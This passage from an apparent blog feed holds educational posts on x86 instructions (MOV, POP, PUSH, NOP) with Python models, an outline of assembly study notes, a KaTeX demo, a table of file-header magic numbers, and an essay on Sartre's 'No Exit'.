### Basic purpose
The MOV instruction is used to copy the value of the source operand to the destination operand.  
This is one of the most commonly used instructions for data transfer.
### Instruction format
```
mov dst, src
dst = src
```
Allowed:
- Register ← Register
- Register ← Memory
- Memory ← Register
- Register ← Immediate
- Memory ← Immediate

Forbidden:
- Memory ← Memory
    

### Behavioral characteristics
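- `mov` never extends a value on its own: source and destination must be the same size. To widen a smaller value, use the separate `movzx` (zero-extend) or `movsx` (sign-extend) instructions
- Does not modify &lt;mark&gt;EFLAGS&lt;/mark&gt; (important)
- In 64-bit mode, writing a 32-bit register (e.g. `mov eax, ...`) automatically clears the upper 32 bits of the corresponding 64-bit register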
    

Example:
```
mov eax, [rbp-0x10]
mov [rbp-0x8], rax
mov ecx, 0x1234
```
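How a write to a sub-register affects the full 64-bit register is a common source of confusion, so here is a small Python model. `write_reg` is a hypothetical helper; it assumes 64-bit mode and, for 8-bit writes, the low-byte registers (such as `al`), not the high-byte ones (such as `ah`).

```python
def write_reg(old64, value, bits):
    """Return the new 64-bit register value after writing `value` to its low `bits` bits."""
    if bits == 64:
        return value % 2**64
    if bits == 32:
        # 32-bit writes zero the upper half of the 64-bit register.
        return value % 2**32
    if bits in (8, 16):
        # 8- and 16-bit writes leave all higher bits untouched.
        upper = old64 - old64 % 2**bits
        return upper + value % 2**bits
    raise ValueError("bits must be 8, 16, 32, or 64")


rax = 0xFFFFFFFFFFFFFFFF
print(hex(write_reg(rax, 0x1234, 32)))  # like mov eax, 0x1234
print(hex(write_reg(rax, 0x1234, 16)))  # like mov ax, 0x1234
```

The asymmetry is deliberate in the architecture: only 32-bit writes clear the upper bits, while 8- and 16-bit writes merge into the old value.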
### Equivalent analysis
MOV is a pure data copy operation and can be regarded as:
```
dst = src
```
Understanding MOV is very helpful for mastering function argument passing and register behavior under the ABI.
### Common uses
- Passing variables
- Initializing registers
- Changing pointer positions
- Saving and restoring values

---</content:encoded></item><item><title>POP</title><link>https://goosequill.erina.top/en/blog/202511221401/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511221401/</guid><description>Notes on importing POP</description><pubDate>Sat, 22 Nov 2025 07:14:00 GMT</pubDate><content:encoded>## POP（pop）

### Basic Function
The POP instruction pops the top value from the stack into the destination operand, then moves the stack pointer upward.  
In contrast to PUSH, POP increases ESP/RSP.
### Instruction Execution Process
64-bit:
```
operand = [rsp]
rsp = rsp + 8
```
32-bit:
```
operand = [esp]
esp = esp + 4
```
### Instruction Format
The following operands are allowed:
- pop r/m16
- pop r/m32 (32-bit mode only; not encodable in 64-bit mode)
- pop r/m64 (64-bit mode only)

Not allowed:
- pop memory to memory
- pop immediate

### Behavioral Characteristics
- The stack pointer moves upward
- The original stack data is not cleared; it only becomes logically invalid
- POP cannot directly pop an immediate value
- The destination register size must match when popping into a register (`pop rax` → 8 bytes)

### Equivalent Expansion Example
```
pop rax
; equivalent to
mov rax, [rsp]
add rsp, 8
```
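The expansion above can be checked against a toy stack model. The sketch below is illustrative only: the `Stack` class, its 64-byte size, and the little-endian `bytearray` backing store are assumptions made for the example. It also shows that `pop` leaves the old bytes in memory.

```python
class Stack:
    """Toy 64-bit stack that grows toward lower addresses."""

    def __init__(self, size=64):
        self.mem = bytearray(size)
        self.rsp = size  # empty stack: rsp sits just past the highest slot

    def push(self, value):
        self.rsp -= 8  # sub rsp, 8
        self.mem[self.rsp:self.rsp + 8] = (value % 2**64).to_bytes(8, "little")

    def pop(self):
        # mov reg, [rsp]
        value = int.from_bytes(self.mem[self.rsp:self.rsp + 8], "little")
        self.rsp += 8  # add rsp, 8
        return value


stack = Stack()
stack.push(0x1122334455667788)
slot = stack.rsp          # address of the pushed value
rax = stack.pop()
print(hex(rax), stack.rsp - slot)
# The popped slot still holds the old bytes; only rsp has moved.
print(stack.mem[slot:slot + 8].hex())
```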
### ASCII Stack Diagram
Before execution:
```
rsp → +------------------+
      |   value to pop   |
      +------------------+
```
After executing pop rax:
```
      +------------------+
      |    (old data)    |
rsp → +------------------+
;       rax = former top-of-stack value
```
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202511221514486.png)
⚠️ Note: the stack data at `0x0012FF88` here is not cleared by `pop`; it remains in memory until later pushes or calls overwrite it
### Common Uses
- Restore saved registers
- Restore stack state before a function returns
- Move the top of the stack to skip data
- Used in PWN for stack pivoting or stack adjustment

---</content:encoded></item><item><title>PUSH</title><link>https://goosequill.erina.top/en/blog/202511220928/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511220928/</guid><description>Import notes for PUSH</description><pubDate>Sat, 22 Nov 2025 07:09:00 GMT</pubDate><content:encoded>##  PUSH (push)

### Basic purpose
The `PUSH` instruction pushes an operand onto the stack and updates the stack pointer.  
In x86/x64, the stack grows toward lower addresses, so `PUSH` decreases the value of `ESP`/`RSP` first, then writes the data to the new top of the stack.
### Instruction execution process
Using 64-bit as an example:
```
rsp = rsp - 8
[rsp] = operand
```
For 32-bit:
```
esp = esp - 4
[esp] = operand
```
### Instruction format
The following operands are allowed:
- push r/m16
- push r/m32 (32-bit mode only; not encodable in 64-bit mode)
- push r/m64 (64-bit mode only)
- push imm8 / imm16 / imm32 (in x64, it is sign-extended to 64 bits)

There is no `push imm64`: in 64-bit mode, an immediate operand is sign-extended to 64 bits before it is written to the stack.
### Behavioral characteristics
- The stack pointer moves downward
- Writing a value does not clear old memory; it only overwrites it
- Immediate values are sign-extended (`push imm32` → 64bit)
- Operands cannot be two memory addresses
- The stack layout changes, affecting function call offset calculations

### Equivalent expansion example
```
push rax
; equivalent to
sub rsp, 8
mov [rsp], rax
```

```
push 0x1234
; equivalent to (the immediate is sign-extended to 64 bits)
sub rsp, 8
mov qword ptr [rsp], 0x0000000000001234
```
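The sign extension of a pushed immediate can be reproduced with plain integer arithmetic. A minimal sketch follows; `sign_extend` is a hypothetical helper name, and values are treated as unsigned bit patterns.

```python
def sign_extend(value, from_bits, to_bits=64):
    """Sign-extend the low `from_bits` bits of `value` to `to_bits` bits."""
    value %= 2**from_bits
    if value >= 2**(from_bits - 1):
        # Top bit set: the value is negative in two's complement.
        value -= 2**from_bits
    return value % 2**to_bits


# push 0x1234: positive immediate, upper bits become zero
print(hex(sign_extend(0x1234, 32)))

# push 0x80000000 (as imm32): top bit set, upper bits become ones
print(hex(sign_extend(0x80000000, 32)))
```

This matters when reading disassembly: an immediate with bit 31 set lands on the stack with its upper 32 bits filled with ones, not zeros.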
### ASCII stack change illustration
Before execution:
```
rsp → +------------------+
      | (old stack data) |
      +------------------+
```

After executing `push rax`:
```
      +------------------+
rsp → |   value of rax   |
      +------------------+
      | (old stack data) |
```
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202511221512956.png)
### Common uses
- Save register contents
- Push arguments during function calls
- Align stack space
- Temporarily save data
- In PWN, used to control stack layout and overwrite return addresses

---</content:encoded></item><item><title>NOP</title><link>https://goosequill.erina.top/en/blog/202511225944/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511225944/</guid><description>Import notes on NOP</description><pubDate>Sat, 22 Nov 2025 06:59:00 GMT</pubDate><content:encoded>##  NOP (nop)

### Basic function
The NOP (No Operation) instruction represents a null operation, meaning that after executing this instruction, the processor does not modify any registers, does not access memory, does not change EFLAGS, and does not affect the program&apos;s logical flow.
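Its only architectural effect is to advance the instruction pointer, so execution continues with the next instruction in sequence; it still occupies space in the instruction stream and takes a small amount of time to fetch and decode.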
### Instruction execution process
The internal behavior of NOP can be understood as:
```
; CPU state is unchanged after execution (apart from the instruction pointer advancing)
```
At the microarchitectural level, it is typically implemented as a special marker used for instruction pipeline filling or alignment, and does not produce any actual read or write operations.
### Instruction format
The basic NOP instruction is a single byte (opcode `0x90`):
```
nop
```
However, in assemblers, multi-byte NOPs can also be used for instruction alignment, for example:
```
nop
nop DWORD ptr [rax+rax]
```
These multi-byte NOPs generated by the compiler serve the same purpose: filling space and aligning addresses.
### Behavioral characteristics
- Does not modify register contents

- Does not access memory

- Does not change EFLAGS

- Does not affect control flow

- Can be used for debugging, patch modification, and filling instruction alignment

- Multi-byte NOPs are commonly used for performance optimization (such as aligning loop bodies to 16-byte boundaries)

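The alignment use case comes down to a small calculation: how many filler bytes are needed to reach the next boundary. The sketch below uses only single-byte NOPs (`0x90`) for simplicity; real assemblers and compilers typically emit fewer, longer multi-byte NOPs instead. The name `nop_padding` is made up for this example.

```python
NOP = b"\x90"  # encoding of the single-byte nop


def nop_padding(offset, alignment=16):
    """Return the NOP bytes needed to advance `offset` to the next `alignment` boundary."""
    return NOP * (-offset % alignment)


pad = nop_padding(0x1003)
print(len(pad), hex(0x1003 + len(pad)))  # number of filler bytes and the aligned address
print(nop_padding(0x1000))               # already aligned: no padding needed
```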
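### Equivalent instruction analysis
From a logical perspective, the effect of NOP is equivalent to:
```
mov rax, rax
```
That is, performing a self-assignment on a register, but a real NOP does not actually read or write any register, so it is more lightweight. Note that in 64-bit mode the 32-bit form `mov eax, eax` is not a NOP, because writing a 32-bit register clears the upper 32 bits of `rax`.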

Assemblers and compilers may also pad with other instructions that leave the architectural state unchanged, for example:
```
lea rax, [rax]
```
However, none of these alternative forms is as pure as the native `nop`.
### Common uses
- Machine code patching: reserve byte space for future instructions

- Debugging: replace a dangerous instruction so the program can continue running

- Code alignment: improve CPU instruction prefetch and branch prediction performance

- Fixing jump offsets: fill gaps with NOPs

- When constructing shellcode, used as a NOP sled (to slide into the payload)

  

---</content:encoded></item><item><title>Assembly Instructions</title><link>https://goosequill.erina.top/en/blog/202511055717/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511055717/</guid><description>Import notes for Assembly Instructions</description><pubDate>Wed, 05 Nov 2025 12:57:00 GMT</pubDate><content:encoded># Assembly Instruction Overview
## Before You Begin
This note serves as the entry point to the entire assembly instruction system, helping build the reader’s overall perspective. There are many assembly language instructions, and without a reasonable structure, they can feel fragmented and difficult to understand.  
To address this, this note organizes all instructions in a layered way:

Level 1 (this document): explains the classification logic, global framework, and learning strategy.  
Level 2: divides instruction categories by function.  
Level 3: each instruction has its own dedicated note, including semantics, behavior, affected registers, common pitfalls, and PWN-related considerations.

All details of specific instructions belong to Level 3 and are not expanded on in this note.

## Explanation of the Classification Logic

Although the x86_64 instruction set is large, the parts that are truly common in reverse engineering and PWN can naturally be divided into several functional modules.  
These modules are not rigid knowledge categories, but are divided from the perspective of &quot;program behavior logic&quot;:

Arithmetic operations — modify data  
Data transfer — move data between registers and memory  
Stack and calls — function call chains and stack frame changes  
Control flow — how program execution changes direction  
Logic and bit operations — structural processing of data  
System interface — related to system calls (optional)

These modules form a complete closed loop of program behavior:  
Where data comes from, how it is processed, how it is pushed onto the stack, how execution jumps, and how it returns.

The Level 2 notes will be organized around these categories.

## Level 2 Category Description (for downstream branch structure)

Below is the recommended functional classification, which will become your Obsidian Level 2 branches:
[[运算与逻辑类]] (Arithmetic and logic)  
Processes data content, including arithmetic and logical operations.  
Common scenarios: decryption, length calculation, and loop counter operations.

[[数据传输类]] (Data transfer)  
Moves data between registers, memory, and the stack.  
This is the foundation for understanding any assembly code.

[[栈与调用类]] (Stack and calls)  
The setup and teardown of the function call stack, one of the most sensitive groups of instructions in PWN.  
Involves push, pop, call, leave, ret, etc.

[[控制流与分支类]] (Control flow and branching)  
The decision points that determine the flow of program logic, including unconditional and conditional jumps.  
In particular, this includes the broad jcc family.

[[位操作与移位类]] (Bit operations and shifts)  
Handles bit-level structures, as used in encryption, hashing, checksums, pointer arithmetic, etc.

String and block operations (optional)  
Such as rep, movs, stos, etc. They do not appear frequently in reverse engineering, but understanding them is highly valuable.

System call related (optional)  
Such as syscall and `int 0x80`. Directly relevant to PWN.

These will each become the main category nodes of the Level 2 notes.

## Overview Table (without backlinks)

The following is the overall structure of your entire instruction library. It does not include links and is only intended to help readers form a complete picture:

Arithmetic and logic

- add
- sub
- inc
- dec
- xor
- not
- and
- or

Data transfer

- mov
- lea
- push
- pop

Stack and calls

- call
- ret
- leave

Control flow

- jmp
- jcc series (je, jne, ja, jb, jge, jle, etc.)

Shift and bit operations

- shl
- shr
- rol
- ror

Other

- nop
- special instructions (such as syscall, etc.)
    

## Usage Guide

To make this knowledge base more like an ever-expanding &quot;reverse engineering dictionary,&quot; the following usage method is recommended:

Encounter assembly → quickly locate by category → look up the corresponding Level 3 instruction  
At the same time, by tracing back through the categories, you can understand &quot;why this instruction appears here&quot; and &quot;how it relates to the instructions around it.&quot;

The role of this note is to provide guidance and structure, rather than to collect details.  
All your instruction notes have already been written, so you only need to create empty documents or directories at the Level 2 branches according to this structure.</content:encoded></item><item><title>KaTeX Math Demo</title><link>https://goosequill.erina.top/en/blog/katex-demo/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/katex-demo/</guid><description>A sample post for verifying KaTeX support in this Astro blog theme.</description><pubDate>Tue, 16 Sep 2025 16:00:00 GMT</pubDate><content:encoded>This post is a quick demo to verify that KaTeX rendering works correctly.

## Inline math

Einstein&apos;s mass-energy equivalence: $E = mc^2$.

For $a \ne 0$, the quadratic equation $ax^2 + bx + c = 0$ has solutions $x = \frac{-b \pm \sqrt{b^2 - 4ac}}{2a}$.

## Display math

The Gaussian summation formula:

$$
\sum_{i=1}^{n} i = \frac{n(n+1)}{2}
$$

Euler&apos;s identity:

$$
e^{i\pi} + 1 = 0
$$

## Matrix

$$
A =
\begin{bmatrix}
1 &amp; 2 &amp; 3 \\
4 &amp; 5 &amp; 6 \\
7 &amp; 8 &amp; 9
\end{bmatrix}
$$

## Piecewise function

$$
f(x) =
\begin{cases}
x^2, &amp; x \ge 0 \\
-x, &amp; x &lt; 0
\end{cases}
$$

## Integral and limit

$$
\int_0^1 x^2\,dx = \frac{1}{3}
$$

$$
\lim_{x \to 0} \frac{\sin x}{x} = 1
$$</content:encoded></item><item><title>Hex Values of Common File Headers</title><link>https://goosequill.erina.top/en/blog/20250916135048/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/20250916135048/</guid><description>Imported note on the hex values of common file headers</description><pubDate>Tue, 16 Sep 2025 05:50:00 GMT</pubDate><content:encoded>##  Hex Values of Common File Headers

This note is a practical guide to common file header identifiers (magic numbers).

### 1. What is a file header identifier (Magic Number)?

1. **Definition**: A file header identifier is a series of specific bytes located at the beginning of a file, usually represented in hexadecimal. It is like a “digital fingerprint” or “signature” used to uniquely identify the file’s type and format.
    
2. **Purpose**:
    
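    - **Tells software how to properly handle a file**: Tools such as the Unix `file` command, and many applications, read the header rather than trusting the extension to determine a file&apos;s type. (Desktop shells, Windows in particular, usually still pick the program that opens a file by its extension.)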
        
    - **Digital forensics and data recovery**: When a file system is damaged, files are deleted, or extensions are maliciously altered, scanning the raw disk data (hex values) for file headers is a primary method for recovery and identification.
        
    - **Malware analysis**: When analyzing a suspicious file, the first step is often to inspect its header to determine its true type. For example, a file that appears to be `.jpg` may actually be an `.exe` executable.
        
    - **Cybersecurity**: WAFs (Web Application Firewalls) and intrusion detection systems (IDS) can inspect file headers to filter illegal file uploads and prevent attacks such as Webshells.
        
3. **Important note**: **File extensions (such as .txt, .exe, .jpg) can be changed arbitrarily and do not represent the file’s true type. File headers, however, are inside the file, and changing them usually corrupts the file, making them much more reliable.**
    

---

### 2. Detailed explanation of common file type headers

Below is a categorized table containing the most common and most important file types. **Offsets are usually counted from the beginning of the file (0x0)**.

#### 1. Image Formats

| File Format            | Common Extensions             | File Header (Hex)                                  | File Footer (Hex) | Notes                                                            |
| --------------- | ----------------- | :------------------------------------------ | :--------- | :------------------------------------------------------------ |
|  **JPEG/JFIF**  |  `.jpg`, `.jpeg`  |  `FF D8 FF E0`                              |  `FF D9`   | The most common image format. The opening `FF D8` indicates the start of a JPEG, and `FF E0` identifies the JFIF application segment.           |
|  **JPEG/Exif**  |  `.jpg`, `.jpeg`  |  `FF D8 FF E1`                              |  `FF D9`   | Created by digital cameras; `FF E1` indicates the Exif application segment.                                   |
|  **PNG**        |  `.png`           |  **`89 50 4E 47 0D 0A 1A 0A`**              | -          |  `50 4E 47` is the ASCII code for the letters &quot;PNG&quot;, making it very easy to recognize.                         |
|  **GIF**        |  `.gif`           |  **`47 49 46 38`**                          |  `00 3B`   |  `47 49 46 38` is the opening part of &quot;GIF89a&quot; or &quot;GIF87a&quot;.                   |
|  **BMP**        |  `.bmp`           |  **`42 4D`**                                | -          |  `42 4D` is the ASCII code for the letters &quot;BM&quot;.                                    |
|  **WEBP**       |  `.webp`          |  **`52 49 46 46 ?? ?? ?? ?? 57 45 42 50`**  | -          |  `52 49 46 46` is &quot;RIFF&quot;, and `57 45 42 50` is &quot;WEBP&quot;. `??` represents the file size field. |
|  **TIFF**       |  `.tif`, `.tiff`  |  `49 49 2A 00` (little-endian) or `4D 4D 00 2A` (big-endian)    | -          | There are two byte orders, so the opening identifiers differ as well.                                               |

#### 2. Archive Formats

| File Format | Common Extensions | File Header (Hex) | File Footer (Hex) | Notes |
| --- | --- | :--- | :--- | :--- |
| **ZIP** | `.zip` | **`50 4B 03 04`** | - | `50 4B` is the ASCII code for the letters &quot;PK&quot; (from the format&apos;s creator, Phil Katz). **This is also the file header for `.docx`, `.xlsx`, `.pptx` and other Office documents**, because they are essentially ZIP archives. |
| **RAR** | `.rar` | **`52 61 72 21 1A 07 00`** (RAR 1.5 to 4.x) | - | `52 61 72 21` is the ASCII code for &quot;Rar!&quot;. The RAR 5.0 format begins with `52 61 72 21 1A 07 01 00`. |
| **7Z** | `.7z` | **`37 7A BC AF 27 1C`** | - | `37 7A` is the ASCII code for &quot;7z&quot;. |
| **GZIP** | `.gz` | **`1F 8B`** | - | Commonly used for compression in Linux systems and network transmission. |
| **TAR** | `.tar` | None at offset 0 | - | TAR has no magic number at the start of the file. POSIX (ustar) archives carry `75 73 74 61 72` (&quot;ustar&quot;) at offset 257 (0x101). |

#### 3. Executable Formats

| File Format | Common Extensions | File Header (Hex) | Notes |
| --- | --- | :--- | :--- |
| **Windows PE** | `.exe`, `.dll`, `.sys` | **`4D 5A`** | `4D 5A` is the ASCII code for the letters &quot;MZ&quot; (from MS-DOS developer Mark Zbikowski). Modern PE files also contain a `PE` signature (`50 45 00 00`) later in the file, at the offset stored at `0x3C` in the `MZ` header. |
| **ELF** | (no extension) | **`7F 45 4C 46`** | `7F` is followed by `45 4C 46`, which is the ASCII code for &quot;ELF&quot;. It is the standard executable format on Linux/Unix. |
| **Mach-O** | (no extension) | `FE ED FA CE` (32-bit) `FE ED FA CF` (64-bit) `CA FE BA BE` (universal binary) | Executable format on macOS and iOS. On little-endian targets (x86, ARM) the 32-bit and 64-bit magic bytes appear reversed on disk, e.g. `CF FA ED FE` for 64-bit. `CA FE BA BE` is also the magic number of Java class files. |

#### 4. Documents &amp; Text

| File Format                   | Common Extensions                            | File Header (Hex)                  | Notes                                      |
| ---------------------- | -------------------------------- | :-------------------------- | :-------------------------------------- |
|  **PDF**               |  `.pdf`                          |  **`25 50 44 46`**          |  `25 50 44 46` is the ASCII code for &quot;%PDF&quot;.        |
|  **Microsoft Office**  |  `.doc`, `.xls`, `.ppt` (old versions)    |  `D0 CF 11 E0 A1 B1 1A E1`  | Old OLE compound document format; all legacy Office documents share this header.           |
|  **Microsoft Office**  |  `.docx`, `.xlsx`, `.pptx` (new versions) |  **`50 4B 03 04`**          | As mentioned earlier, they are ZIP files, so their file header is the same as ZIP.             |
|  **UTF-8 BOM**         |  `.txt` etc.                        |  `EF BB BF`                 |  **Byte Order Mark (BOM)**; not required, but it sometimes appears at the beginning of a file to indicate encoding. |

#### 5. Audio &amp; Video

| File Format | Common Extensions | File Header (Hex) | Notes |  
| --- | --- | :--- | :--- |  
| **MP3** | `.mp3` | `FF FB` or `FF F3` or `49 44 33` | MP3 files may have an ID3 tag (`49 44 33`, meaning &quot;ID3&quot;), or they may start directly with a frame sync signal (`FF F?`). |  
| **WAV** | `.wav` | **`52 49 46 46 ?? ?? ?? ?? 57 41 56 45`** | `52 49 46 46` is &quot;RIFF&quot;, and `57 41 56 45` is &quot;WAVE&quot;. |  
| **AVI** | `.avi` | **`52 49 46 46 ?? ?? ?? ?? 41 56 49 20`** | `52 49 46 46` is &quot;RIFF&quot;, and `41 56 49 20` is &quot;AVI &quot;. |  
| **MP4** | `.mp4` | `00 00 00 18 66 74 79 70 69 73 6F 6D` or `00 00 00 20 66 74 79 70 69 73 6F 6D`| It starts with a length field, but the key marker is `66 74 79 70`, meaning &quot;ftyp&quot;. |  
| **FLV** | `.flv` | **`46 4C 56 01`** | `46 4C 56` is the ASCII code for &quot;FLV&quot;. |

---
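The signature tables above translate directly into a lookup. The Python sketch below is a minimal illustration, not a replacement for `file` or libmagic: it covers only a handful of the listed formats, and the names `SIGNATURES` and `identify` are made up for this example.

```python
# (magic bytes at offset 0, format name), taken from the tables above
SIGNATURES = [
    (b"\x89PNG\r\n\x1a\n", "PNG"),
    (b"\xff\xd8\xff", "JPEG"),
    (b"GIF8", "GIF"),
    (b"PK\x03\x04", "ZIP (or docx/xlsx/pptx)"),
    (b"\x7fELF", "ELF"),
    (b"MZ", "Windows PE"),
    (b"%PDF", "PDF"),
    (b"\x1f\x8b", "GZIP"),
]

# RIFF containers are distinguished by the four bytes at offset 8.
RIFF_KINDS = {b"WEBP": "WEBP", b"WAVE": "WAV", b"AVI ": "AVI"}


def identify(data):
    """Guess a file type from its leading bytes; returns 'unknown' if nothing matches."""
    for magic, name in SIGNATURES:
        if data.startswith(magic):
            return name
    if data[:4] == b"RIFF" and len(data) >= 12:
        return RIFF_KINDS.get(data[8:12], "RIFF (unknown subtype)")
    return "unknown"


print(identify(b"\x89PNG\r\n\x1a\n" + bytes(8)))
print(identify(b"RIFF\x00\x00\x00\x00WEBPVP8 "))
print(identify(b"plain text"))
```

To check a real file, read its first bytes with `open(path, "rb").read(16)` and pass them to `identify`. A match only says what the header claims; a deliberately crafted file can still carry a misleading signature.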

### 3. How to view and practice?

1. **Use a hex editor**:
    
    - **Recommended tools**: HxD (Windows), 010 Editor (cross-platform, professional), Bless Hex Editor (Linux), WinHex (Windows, professional).
        
    - **Method**: Open any file with these tools, and you will directly see its raw hexadecimal bytes. Compare them against the table above for verification.
        
2. **Use command-line tools (Linux/macOS)**:
    
    - `file` command: `file example.jpg` identifies the file type by reading and analyzing the file header rather than relying on the extension.
        
    - `xxd` or `hexdump` command: `xxd example.jpg | head -n 5` can display the first few lines of a file in hexadecimal form.
        
3. **Online tools**:
    
    - Search for &quot;online hex editor&quot; or &quot;file signature lookup&quot;. Many websites let you upload files or directly enter hex values for identification.</content:encoded></item><item><title>Sartre: Living in the Gaze of Others Is Living in Hell</title><link>https://goosequill.erina.top/en/blog/text/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/text/</guid><description>Test My page</description><pubDate>Wed, 16 Apr 2025 13:55:00 GMT</pubDate><content:encoded>## Sartre: Living in the Gaze of Others Is Living in Hell
&lt;progress value=&quot;90&quot; max=&quot;100&quot; style=&quot;width: 100%;&quot;&gt;&lt;/progress&gt;
&lt;font color=&quot;#646a73&quot;&gt;Total: 2,466 characters | Approx. 5 min read&lt;/font&gt;

## Thought Shuttle
In Dante&apos;s *Divine Comedy*, hell is a vast abyss that plunges straight from the surface to the center of the earth, shaped like a wide-topped, narrow-bottomed funnel. The souls of sinners, according to the severity of their earthly transgressions, are placed in different levels of this &quot;funnel&quot; to receive punishment: some sink into mud pits, enduring wind and rain; others are burned alive in raging flames, crying out in agony... All these horrors subtly suggest that &lt;font color=&quot;#c3d69b&quot;&gt;life on earth is precious, and one should cherish it while living.&lt;/font&gt;

But is the human world truly as wonderful as people imagine?

One thinker disagreed. For him, there exists something called &lt;font color=&quot;#d99694&quot;&gt;&quot;purgatory on earth.&quot;&lt;/font&gt; It may not be a tangible place, but like a dense fog, it shrouds the mind and invades one&apos;s spiritual world. Today&apos;s Thought Shuttle will fly into this thinker&apos;s intellectual universe to explore what this &quot;earthly purgatory&quot; really is. He is the great philosopher who masterfully combined &lt;font color=&quot;#00b050&quot;&gt;literary and intellectual depth — Sartre.&lt;/font&gt;

## Today&apos;s Protagonist: Sartre
&lt;font color=&quot;#00b050&quot;&gt;Jean-Paul Sartre&lt;/font&gt;, born June 21, 1905, in Paris, is one of the most important French philosophers of the 20th century and a leading representative of &lt;font color=&quot;#92cddc&quot;&gt;&quot;atheistic existentialism.&quot;&lt;/font&gt; A philosopher by vocation, he was also a gifted writer, producing numerous literary and dramatic works in an attempt to elucidate his philosophical ideas through skillful literary expression.

Sartre&apos;s childhood, like that of many children today, was steeped in the love of his grandparents. He spent most of his time with his maternal grandparents. His grandfather, a professor of linguistics, had a vast collection of books at home, and this knowledge-filled environment became a paradise for the young Sartre to absorb learning.

In 1929, the 24-year-old Sartre brilliantly achieved first place in the national competitive examination for teaching positions in secondary schools, where he also met &lt;font color=&quot;#00b050&quot;&gt;Simone de Beauvoir&lt;/font&gt;, who earned second place. Their astonishing and controversial love story has long been the subject of public fascination and gossip (curious? Search online).

As a thinker, Sartre&apos;s literary prowess was no less than that of other literary giants. He famously declined the 1964 Nobel Prize in Literature, giving the simple reason: &lt;font color=&quot;#92d050&quot;&gt;&quot;I decline all official honors.&quot;&lt;/font&gt;

Sartre&apos;s most famous idea is undoubtedly &quot;Hell is other people.&quot; Perhaps many of you are also experiencing the gloom encapsulated in this very phrase. 🚪[[Quote - No need for red-hot grills; hell is other people]]

### What He Thought: Hell Is Other People
**Keywords:**
&gt; Sartre&apos;s *No Exit*
&gt; Hell is other people
&gt; The relationship between self and others
&gt; Hell has no torture instruments — only &quot;other people&quot;

#### Background
In 1944, Sartre&apos;s play &lt;font color=&quot;#00b050&quot;&gt;*No Exit* (Huis Clos)&lt;/font&gt; premiered in Paris. The profound meaning and far-reaching influence of this play have far exceeded the scope of drama itself, sparking philosophical contemplation. Its central theme concerns the relationship between oneself and others.

The protagonists are three sinners after death, cast into a strange hell devoid of torture devices and mirrors. The three can only affirm their own existence through the gaze of others. At the same time, they are on guard against one another, hiding secrets, hoping to suppress their sordid pasts and project a favorable image in each other&apos;s eyes. A bizarre scene unfolds in this hell: &lt;mark style=&quot;background: #fb8b05;&quot;&gt;They each isolate themselves, yet mutually &quot;interrogate&quot; one another. Each becomes the scrutinizer of the others, while simultaneously being constrained ceaselessly by &quot;the gaze of others.&quot;&lt;/mark&gt;

#### Sartre&apos;s Famous Play *No Exit*
This is an ordeal — an unbearable torment. None of the three find peace; none can leave; none can be at ease, free, and authentic to themselves. Finally, one of the protagonists, &lt;font color=&quot;#00b050&quot;&gt;Garcin&lt;/font&gt;, realizes why this hell has no torture instruments, and cries out in anguish:

&gt; [!info]
&gt; &quot;I would never have believed it. Hell has no sulphur, no blazing stakes, no red-hot irons. What a &lt;span style=&quot;background:#d4b106&quot;&gt;joke!&lt;/span&gt;
&gt; No need for &lt;font color=&quot;#6425d0&quot;&gt;sulphur&lt;/font&gt;, &lt;font color=&quot;#6425d0&quot;&gt;stakes&lt;/font&gt;, or &lt;font color=&quot;#6425d0&quot;&gt;irons&lt;/font&gt; — hell is &lt;mark style=&quot;background: #f1441d;&quot;&gt;other people!&lt;/mark&gt;
&gt; The eyes of others are mirrors — or perhaps &lt;mark style=&quot;background: #158bb8;&quot;&gt;demonic mirrors from hell.&lt;/mark&gt;&quot;

Through the voice of the protagonist Garcin, Sartre articulates his thoughts on the relationship between self and others: A great many people in the world live in &quot;hell&quot; &lt;font color=&quot;#00b0f0&quot;&gt;because they are overly dependent on others&apos; judgments of themselves.&lt;/font&gt; This contains two layers of meaning:

First, &lt;font color=&quot;#e36c09&quot;&gt;we care too much about the gaze of others.&lt;/font&gt; Thus, when the relationship between self and others becomes discordant, we cannot find our own footing.

Second, when we &lt;font color=&quot;#e36c09&quot;&gt;cannot properly handle unfavorable judgments from others,&lt;/font&gt; their &quot;malicious&quot; evaluations become our &lt;mark style=&quot;background: #f1441d;&quot;&gt;hell&lt;/mark&gt;.

Living in this world, no one is a solitary individual; one must inevitably interact with those around them. Typically, we understand whether our actions are appropriate and whether our approaches help build good relationships through these interactions. &lt;font color=&quot;#92d050&quot;&gt;On nights when we &quot;reflect on ourselves three times a day,&quot; who among us doesn&apos;t search the day&apos;s memories for a parent&apos;s comment, a teacher&apos;s glance, or a classmate&apos;s reply?&lt;/font&gt;

But when a single word from another person pierces you, or when, after turning it over again and again, you feel they are subtly criticizing you, that they might no longer like you, that your relationship seems to be deteriorating, don&apos;t you feel in that moment as if you&apos;ve arrived at the gates of hell, helpless yet resentful, anxious and uneasy? Don&apos;t you feel that, though still on earth, you might as well be in purgatory because of the presence of others?

#### A Single Thought Can Turn Hell into Heaven

If others are hell, are we then trapped in this hell inescapably? Perhaps we should thank Sartre for not closing the door entirely. In his view, &lt;font color=&quot;#fac08f&quot;&gt;others may certainly be a formidable obstacle, but not one we cannot overcome.&lt;/font&gt;

##### How to resolve the problem that &quot;Hell is other people&quot;?

First, we &lt;font color=&quot;#ff0000&quot;&gt;draw too absolute a distinction&lt;/font&gt; between &quot;self&quot; and &quot;others&quot; in our consciousness, which reinforces an &lt;mark style=&quot;background: #20894d;&quot;&gt;&quot;egocentric&quot; mindset. Being overly self-centered inevitably leads to a lack of proper regard for others. In this case, we ourselves become the culprits in worsening our relationships, and we too must bear the responsibility for the &quot;torments of hell.&quot;&lt;/mark&gt;

Second, we fall into distress because we cannot properly handle the judgments and evaluations others make of us. But in truth, while others&apos; judgments are certainly important, they are for reference only. &lt;mark style=&quot;background: #20894d;&quot;&gt;*Treating them as the ultimate verdict is absolutely unacceptable.* If we live uncomfortably just to hear a flattering word or praise from others, or to reduce their negative comments or attacks on us, our authentic self will inevitably, in some midnight hour, fall into a tormented corner of the soul.&lt;/mark&gt;

